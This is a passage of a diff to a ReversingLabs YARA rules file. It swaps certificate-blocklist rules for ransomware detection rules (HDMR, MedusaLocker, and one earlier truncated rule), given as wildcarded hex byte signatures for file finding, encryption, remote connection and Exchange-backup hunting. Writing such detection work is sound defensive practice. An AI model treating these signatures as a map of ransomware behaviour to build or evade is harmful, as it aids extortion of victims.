+            ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 3A ?? ?? ?? ?? 08 6F ?? ?? ?? ??
+            6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 3A ?? ?? ?? ?? 08 6F ?? ?? ?? ?? 6F ?? ??
+            ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 3A
+        }
+		$find_files_p3 = {
+            6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 3A ?? ?? ?? ?? 08 6F ?? ??
+            ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 3A ?? ?? ?? ?? 08 6F ?? ?? ?? ?? 6F
+            ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 08 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 00 6F
+            ?? ?? ?? ?? 2D ?? 08 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 08 6F ?? ?? ??
+            ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 08 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ??
+            2D ?? 08 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 08 6F ?? ?? ?? ?? 72 ?? ??
+            ?? ?? 6F ?? ?? ?? ?? 16 FE 01 2B ?? 16 00 13 ?? 11 ?? 2D ?? DD ?? ?? ?? ?? 08 6F ?? ??
+            ?? ?? 28 ?? ?? ?? ?? 2C ?? 08 6F ?? ?? ?? ?? 6C 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 23 ?? ??
+            ?? ?? ?? ?? ?? ?? 5A 23 ?? ?? ?? ?? ?? ?? ?? ?? 5A 35 ?? 7E ?? ?? ?? ?? 72 ?? ?? ?? ??
+            28 ?? ?? ?? ?? 16 FE 01 2B ?? 17 00 13 ?? 11 ?? 2D ?? 00 06 08 6F ?? ?? ?? ?? 6F ?? ??
+            ?? ?? 00 00 2B ?? 08 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 7E ?? ?? ?? ?? 72 ?? ?? ?? ??
+            28 ?? ?? ?? ?? 16 FE 01 2B ?? 17 00 13 ?? 11 ?? 2D ?? 00 06 08 6F ?? ?? ?? ?? 6F ?? ??
+            ?? ?? 00 00 00 DE ?? 26 00 00 DE ?? 26 00 00 DE ?? 00 00 00 11 ?? 6F ?? ?? ?? ?? 13 ??
+            11 ?? 3A ?? ?? ?? ?? DE ?? 11 ?? 14 FE 01 13 ?? 11 ?? 2D ?? 11 ?? 6F ?? ?? ?? ?? 00 DC
+            00 00 DE ?? 26 00 00 DE ?? 26 00 00 DE ?? 00 00 11 ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 3A ??
+            ?? ?? ?? DE ?? 11 ?? 14 FE 01 13 ?? 11 ?? 2D ?? 11 ?? 6F ?? ?? ?? ?? 00 DC 00 00 DE ??
+            26 00 00 DE ?? 26 00 00 DE ?? 26 00 00 DE ?? 26 00 00 DE ?? 00 06 13 ?? 2B ?? 11 ?? 2A
+        }
+		$encrypt_files = {
+            73 ?? ?? ?? ?? 13 ?? 11 ?? 03 7D ?? ?? ?? ?? 11 ?? 04 7D ?? ?? ?? ?? 11 ?? 05 7D ?? ??
+            ?? ?? 11 ?? 0E ?? 7D ?? ?? ?? ?? 00 28 ?? ?? ?? ?? 11 ?? 7B ?? ?? ?? ?? 6F ?? ?? ?? ??
+            80 ?? ?? ?? ?? 02 16 9A 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 16 FE 01 13 ?? 11 ?? 2D ?? 00 28
+            ?? ?? ?? ?? 0A 06 8E 69 16 FE 02 16 FE 01 13 ?? 11 ?? 2D ?? 00 16 0B 2B ?? 00 06 07 9A
+            6F ?? ?? ?? ?? 16 FE 01 13 ?? 11 ?? 2D ?? 00 7E ?? ?? ?? ?? 06 07 9A 6F ?? ?? ?? ?? 6F
+            ?? ?? ?? ?? 13 ?? 11 ?? 2D ?? 00 7E ?? ?? ?? ?? 06 07 9A 6F ?? ?? ?? ?? 6F ?? ?? ?? ??
+            00 00 00 00 07 17 58 0B 07 06 8E 69 FE 04 13 ?? 11 ?? 2D ?? 00 00 2B ?? 00 16 0B 2B ??
+            00 7E ?? ?? ?? ?? 02 07 9A 6F ?? ?? ?? ?? 13 ?? 11 ?? 2D ?? 00 7E ?? ?? ?? ?? 02 07 9A
+            6F ?? ?? ?? ?? 00 00 00 07 17 58 0B 07 02 8E 69 FE 04 13 ?? 11 ?? 2D ?? 00 7E ?? ?? ??
+            ?? 72 ?? ?? ?? ?? 00 6F ?? ?? ?? ?? 2C ?? 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ??
+            16 FE 01 2B ?? 17 00 13 ?? 11 ?? 2D ?? 00 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 00 6F ?? ?? ??
+            ?? 26 00 00 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 38 ?? ?? ?? ?? 14 0D 73 ?? ?? ?? ?? 13
+            ?? 11 ?? 11 ?? 7D ?? ?? ?? ?? 11 ?? 12 ?? 28 ?? ?? ?? ?? 7D ?? ?? ?? ?? 00 7E ?? ?? ??
+            ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 16 FE 01 13 ?? 11 ?? 2D ?? 00 09 2D ?? 11 ?? FE 06 ??
+            ?? ?? ?? 73 ?? ?? ?? ?? 0D 2B ?? 09 73 ?? ?? ?? ?? 0C 08 1A 6F ?? ?? ?? ?? 00 08 16 6F
+            ?? ?? ?? ?? 00 08 6F ?? ?? ?? ?? 00 08 6F ?? ?? ?? ?? 00 00 2B ?? 00 11 ?? 7B ?? ?? ??
+            ?? 11 ?? 7B ?? ?? ?? ?? 11 ?? 7B ?? ?? ?? ?? 11 ?? 7B ?? ?? ?? ?? 11 ?? 7B ?? ?? ?? ??
+            28 ?? ?? ?? ?? 00 00 00 12 ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 3A ?? ?? ?? ?? DE ?? 12 ?? FE
+            16 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 DC 00 00 2A
+        }
+		$remote_connection = {
+            00 00 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 16 19 6F ?? ?? ?? ??
+            72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A 73 ?? ?? ?? ?? 0B 07 02 28 ?? ?? ?? ?? 06 28 ?? ?? ??
+            ?? 6F ?? ?? ?? ?? 00 28 ?? ?? ?? ?? 06 28 ?? ?? ?? ?? 0C DE ?? 26 00 00 DE ?? 00 7E ??
+            ?? ?? ?? 0C 2B ?? 00 08 2A
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Unirad LLC" and pe.signatures [ i ] . serial == "56:6a:c1:6a:57:b1:32:d3:f6:4d:ce:d1:4d:e7:90:ee" and 1562889600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( $encrypt_files ) and ( $remote_connection )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_D2Caf7908Aaebfa1A8F3E2136Fece024 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_HDMR : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects HDMR ransomware."
 		author = "ReversingLabs"
-		id = "6c2c4fc6-5359-55fa-bf79-9202caa5f326"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "97b5020c-6cb1-5ec6-84a4-2f35eae761c2"
+		date = "2020-06-26"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L4498-L4516"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.HDMR.yara#L1-L161"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "cf4d17274ef36d61e78578d34634bf6e5fb0fb857a9a92184916b0f3b8484568"
+		logic_hash = "035c6596db8dc14a663679c1f7e682b85963927cc034b01e390cc22fdee3334a"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "HDMR"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$find_files_p1 = {
+            55 8B EC 83 E4 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ??
+            ?? ?? 53 56 8B 75 ?? 57 33 C0 68 ?? ?? ?? ?? 50 8D 8C 24 ?? ?? ?? ?? 51 89 74 24 ??
+            66 89 84 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 56 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ??
+            ?? 52 FF 15 ?? ?? ?? ?? 83 C4 ?? 8D 44 24 ?? 50 8D 8C 24 ?? ?? ?? ?? 51 FF 15 ?? ??
+            ?? ?? 89 44 24 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? EB
+            ?? 8D 49 ?? 8B 74 24 ?? F6 44 24 ?? ?? 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D 44 24 ??
+            66 8B 10 66 3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1
+            ?? 66 85 D2 75 ?? 33 C0 EB ?? 1B C0 83 D8 ?? 85 C0 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ??
+            8D 44 24 ?? 66 8B 10 66 3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83
+            C0 ?? 83 C1 ?? 66 85 D2 75 ?? 33 C0 EB ?? 1B C0 83 D8 ?? 85 C0 0F 84 ?? ?? ?? ?? 8D
+        }
+		$find_files_p2 = {
+            54 24 ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 44 24
+            ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 8D 4C 24
+            ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 8D 54 24
+            ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 8D 44 24
+            ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 4C 24 ?? 68
+            ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 54 24 ?? 68 ?? ??
+            ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 33 C0 68 ?? ?? ?? ?? 50 8D
+            8C 24 ?? ?? ?? ?? 51 66 89 84 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 54 24 ?? 52
+            56 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 51
+            E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 8B F0 83
+            C4 ?? 85 F6 74 ?? 8B 44 24 ?? 8D 54 24 ?? 52 50 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ??
+            8B 0D ?? ?? ?? ?? 83 C4 ?? 3B 0D ?? ?? ?? ?? 7C ?? 8D 49 ?? 6A ?? FF 15 ?? ?? ?? ??
+            8B 15 ?? ?? ?? ?? 3B 15 ?? ?? ?? ?? 7D ?? 68 ?? ?? ?? ?? FF D7 FF 05 ?? ?? ?? ?? 68
+            ?? ?? ?? ?? FF D3 6A ?? 6A ?? 56 68 ?? ?? ?? ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 50 FF
+            15 ?? ?? ?? ?? 8B 74 24 ?? 8D 44 24 ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ??
+            ?? 56 FF 15 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 5F 5E 5B 33 CC E8 ?? ?? ?? ?? 8B E5 5D
+            C3
+        }
+		$encrypt_files_p1 = {
+            55 8B EC 83 E4 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ??
+            ?? ?? 53 56 57 33 C0 8B D9 68 ?? ?? ?? ?? 50 8D 8C 24 ?? ?? ?? ?? 51 89 5C 24 ?? 66
+            89 84 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 94 24 ?? ?? ?? ?? 52 6A ?? 6A ?? 6A
+            ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 66 83 BC 24 ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? BF ?? ??
+            ?? ?? 33 F6 8D 84 24 ?? ?? ?? ?? 57 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ??
+            ?? 83 C6 ?? 83 C7 ?? 81 FE ?? ?? ?? ?? 72 ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ??
+            68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 8B D8 83 FB ?? 0F 84 ?? ?? ?? ?? 8D 4C 24 ?? 51
+            53 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 44 24 ?? 85 C0 0F 8C ?? ?? ?? ?? 8B
+            7C 24 ?? 7F ?? 83 FF ?? 0F 82 ?? ?? ?? ?? 8B F0 89 7C 24 ?? 89 74 24 ?? 85 C0 7C ??
+            7F ?? 83 FF ?? 76 ?? 6A ?? 6A ?? 6A ?? 53 C7 44 24 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ??
+            33 C0 50 8D 54 24 ?? 52 89 44 24 ?? 89 44 24 ?? 66 89 44 24 ?? 88 44 24 ?? 6A ?? 8D
+            44 24 ?? 50 53 C6 44 24 ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B C7 83 E8
+            ?? 8B CE 83 D9 ?? 33 F6 39 44 24 ?? 75 ?? 3B F1 75 ?? 8B 4C 24 ?? 3B 0D ?? ?? ?? ??
+            0F 84 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 53 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 50
+            E8 ?? ?? ?? ?? 83 C4 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 8D 54 24 ?? 6A ?? 52 C6 44
+        }
+		$encrypt_files_p2 = {
+            24 ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 33 F6 E8 ?? ?? ?? ?? 25 ?? ?? ?? ?? 79 ?? 48 0D ??
+            ?? ?? ?? 40 88 44 34 ?? 46 83 FE ?? 7C ?? 8B 44 24 ?? BE ?? ?? ?? ?? 85 C0 0F 8F ??
+            ?? ?? ?? 0F 8C ?? ?? ?? ?? 81 FF ?? ?? ?? ?? 0F 83 ?? ?? ?? ?? 85 C0 0F 8C ?? ?? ??
+            ?? 7F ?? 85 FF 0F 84 ?? ?? ?? ?? 85 C0 7F ?? 7C ?? 3B FE 73 ?? 6A ?? 6A ?? 50 57 E8
+            ?? ?? ?? ?? 8B F7 2B F0 56 E8 ?? ?? ?? ?? 8B F8 33 C0 83 C4 ?? 89 44 24 ?? 89 44 24
+            ?? 3B F8 74 ?? 50 8D 44 24 ?? 50 56 57 53 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 39 74 24 ??
+            75 ?? 6A ?? 6A ?? 6A ?? 53 FF 15 ?? ?? ?? ?? 56 57 8D 44 24 ?? E8 ?? ?? ?? ?? 83 C4
+            ?? 6A ?? 8D 4C 24 ?? 51 56 57 53 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 53 FF 15
+            ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 5F 5E 5B 8B 8C 24 ?? ?? ?? ?? 33 CC E8 ?? ??
+            ?? ?? 8B E5 5D C3 53 FF 15 ?? ?? ?? ?? 85 FF 0F 84 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83
+            C4 ?? 5F 5E 5B 8B 8C 24 ?? ?? ?? ?? 33 CC E8 ?? ?? ?? ?? 8B E5 5D C3 6A ?? 68 ?? ??
+            ?? ?? 50 57 E8 ?? ?? ?? ?? 8B C8 89 44 24 ?? B8 ?? ?? ?? ?? F7 E9 C1 FA ?? 8B C2 C1
+            E8 ?? 03 C2 69 C0 ?? ?? ?? ?? 8B D1 2B D0 85 D2 7E ?? 41 89 4C 24 ?? 33 C0 89 44 24
+            ?? 3B C8 0F 8E ?? ?? ?? ?? 89 44 24 ?? EB ?? 90 8B 7C 24 ?? 8B 44 24 ?? 8B 4C 24
+        }
+		$encrypt_files_p3 = {
+            99 2B F8 1B CA 89 7C 24 ?? 89 4C 24 ?? 0F 88 ?? ?? ?? ?? 7F ?? 85 FF 0F 84 ?? ?? ??
+            ?? 8B C6 99 3B CA 7F ?? 7C ?? 3B F8 73 ?? 6A ?? 6A ?? 51 57 E8 ?? ?? ?? ?? 8B F7 2B
+            F0 85 F6 0F 8E ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 8B F8 33 C0 83 C4 ?? 89 44 24 ?? 89 44
+            24 ?? 3B F8 0F 84 ?? ?? ?? ?? 50 8D 44 24 ?? 50 56 57 53 FF 15 ?? ?? ?? ?? 85 C0 0F
+            84 ?? ?? ?? ?? 39 74 24 ?? 0F 85 ?? ?? ?? ?? 6A ?? 6A ?? 8B CE F7 D9 51 53 FF 15 ??
+            ?? ?? ?? 56 57 8D 44 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 8D 54 24 ?? 52 56 57 53 FF
+            15 ?? ?? ?? ?? 85 C0 74 ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 81 FE ?? ?? ?? ?? 7C ?? 83 7C
+            24 ?? ?? 7C ?? 7F ?? 81 7C 24 ?? ?? ?? ?? ?? 72 ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 53 FF
+            15 ?? ?? ?? ?? 8B 44 24 ?? 81 44 24 ?? ?? ?? ?? ?? 40 89 44 24 ?? 3B 44 24 ?? 0F 8C
+            ?? ?? ?? ?? EB ?? 53 FF 15 ?? ?? ?? ?? EB ?? 53 FF 15 ?? ?? ?? ?? 85 FF 74 ?? 57 E8
+            ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? 68
+            ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 53 FF 15 ?? ?? ?? ?? 68
+        }
+		$encrypt_files_p4 = {
+            8D 84 24 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 8B 44 24 ?? 83 C4 ?? B9 ?? ?? ?? ?? 8D
+            74 24 ?? 8D BC 24 ?? ?? ?? ?? F3 A5 8B 4C 24 ?? 6A ?? 89 8C 24 ?? ?? ?? ?? 8B D0 8D
+            4C 24 ?? 51 C1 FA ?? 68 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? A1 ??
+            ?? ?? ?? 52 53 C7 44 24 ?? ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 53 FF
+            15 ?? ?? ?? ?? 33 C0 68 ?? ?? ?? ?? 50 8D 8C 24 ?? ?? ?? ?? 51 66 89 84 24 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 8B 74 24 ?? 83 C4 ?? 68 ?? ?? ?? ?? 56 68 ?? ?? ?? ?? 8D 94 24 ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 94 24 ?? ?? ?? ?? 52 56 FF 15 ?? ?? ?? ?? 5F 5E
+            5B 8B 8C 24 ?? ?? ?? ?? 33 CC E8 ?? ?? ?? ?? 8B E5 5D C3 53 FF 15 ?? ?? ?? ?? 8B 8C
+            24 ?? ?? ?? ?? 5F 5E 5B 33 CC E8 ?? ?? ?? ?? 8B E5 5D C3
+        }
+		$find_MS_xchange_backups_p1 = {
+            55 8B EC 83 E4 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ??
+            ?? ?? 53 56 57 68 ?? ?? ?? ?? 8D 44 24 ?? 6A ?? 50 E8 ?? ?? ?? ?? 8B 3D ?? ?? ?? ??
+            8B 1D ?? ?? ?? ?? B0 ?? 88 44 24 ?? 88 44 24 ?? B0 ?? 83 C4 ?? C6 44 24 ?? ?? C7 44
+            24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 66 C7 44 24 ?? ?? ?? C7 44 24 ?? ?? ?? ??
+            ?? 88 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 66 C7 44 24 ?? ?? ?? C6 44 24 ?? ?? 88 44 24
+            ?? 88 44 24 ?? BE ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8B FF 68 ?? ?? ?? ?? 8D 8C 24
+            ?? ?? ?? ?? 6A ?? 51 C6 84 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 56 8D 54 24 ??
+            52 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 6A ?? 8D 4C 24 ?? 6A ?? 51
+            E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 33 D2 89 44 24 ?? 89 44 24 ?? 89 44 24 ?? 89 44 24 ??
+            8D 44 24 ?? 50 8D 4C 24 ?? 51 52 52 52 52 52 52 66 89 54 24 ?? 8D 94 24 ?? ?? ?? ??
+            52 6A ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? FF D3 6A ?? FF D7 83 C6 ??
+            FF 4C 24 ?? 0F 85 ?? ?? ?? ?? BE ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? EB ?? 8D 49 ??
+            68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 6A ?? 50 C6 84 24 ?? ?? ?? ?? ?? E8
+        }
+		$find_MS_xchange_backups_p2 = {
+            83 C4 ?? 56 8D 4C 24 ?? 51 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 6A
+            ?? 8D 44 24 ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 33 C9 8D 54 24 ?? 52 89 44 24
+            ?? 89 44 24 ?? 89 44 24 ?? 89 44 24 ?? 8D 44 24 ?? 50 51 51 51 51 51 51 66 89 4C 24
+            ?? 8D 8C 24 ?? ?? ?? ?? 51 6A ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? FF
+            D3 6A ?? FF D7 83 C6 ?? FF 4C 24 ?? 0F 85 ?? ?? ?? ?? 33 D2 68 ?? ?? ?? ?? 52 8D 84
+            24 ?? ?? ?? ?? 50 66 89 94 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 68
+            ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 B1 ?? EB ?? 8D 49 ??
+            30 88 ?? ?? ?? ?? 40 3D ?? ?? ?? ?? 72 ?? 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 6A ??
+            51 C6 84 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 94 24 ?? ?? ??
+            ?? 52 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8C 24 ?? ?? ?? ?? 68 ?? ??
+            ?? ?? 51 E8 ?? ?? ?? ?? 8B F0 83 C4 ?? 85 F6 74 ?? 56 68 ?? ?? ?? ?? 6A ?? 68 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 8D 54 24 ?? 6A ?? 52 E8 ?? ??
+            ?? ?? 83 C4 ?? 33 C0 8D 4C 24 ?? 51 8D 54 24 ?? 52 50 50 50 50 50 50 89 44 24 ?? 89
+            44 24 ?? 89 44 24 ?? 89 44 24 ?? 66 89 44 24 ?? 8D 84 24 ?? ?? ?? ?? 50 6A ?? C7 44
+            24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? FF D3 8B 8C 24 ?? ?? ?? ?? 5F 5E 5B 33 CC
+            E8 ?? ?? ?? ?? 8B E5 5D C3
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "FANATOR, OOO" and ( pe.signatures [ i ] . serial == "00:d2:ca:f7:90:8a:ae:bf:a1:a8:f3:e2:13:6f:ec:e0:24" or pe.signatures [ i ] . serial == "d2:ca:f7:90:8a:ae:bf:a1:a8:f3:e2:13:6f:ec:e0:24" ) and 1599041760 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) ) and ( all of ( $find_MS_xchange_backups_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_E04A344B397F752A45B128A594A3D6B5 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Medusalocker : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects MedusaLocker ransomware."
 		author = "ReversingLabs"
-		id = "b396e08c-b7dc-5498-9c68-2d8cdc5dd3d3"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "8bfcfe13-b519-5c03-9770-cf245b01c395"
+		date = "2020-06-26"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L4518-L4536"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.MedusaLocker.yara#L1-L174"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "0489577c6050f0c5d1dad5bda8c4f3c895902b932cd0324087712ccb83f14680"
+		logic_hash = "73f915d476d1411d2e008d00c5ffa03596e3b62bcdbc4d91dc7226599a066c08"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "MedusaLocker"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$encrypt_files_p1 = {
+            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ??
+            33 C5 89 45 ?? 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 83 7D ?? ?? 74 ?? 83
+            7D ?? ?? 75 ?? 32 C0 E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 8B 45 ?? 50 8B 8D ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 81 BD ?? ?? ?? ?? ?? ?? ?? ?? 73 ?? 32 C0 E9 ??
+            ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 33 C9 89 4D ?? 8D 55 ?? 52 8B 45 ?? 50 FF 15 ?? ?? ??
+            ?? 85 C0 75 ?? 32 C0 E9 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 6A ??
+            8B 8D ?? ?? ?? ?? 51 8D 4D ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ??
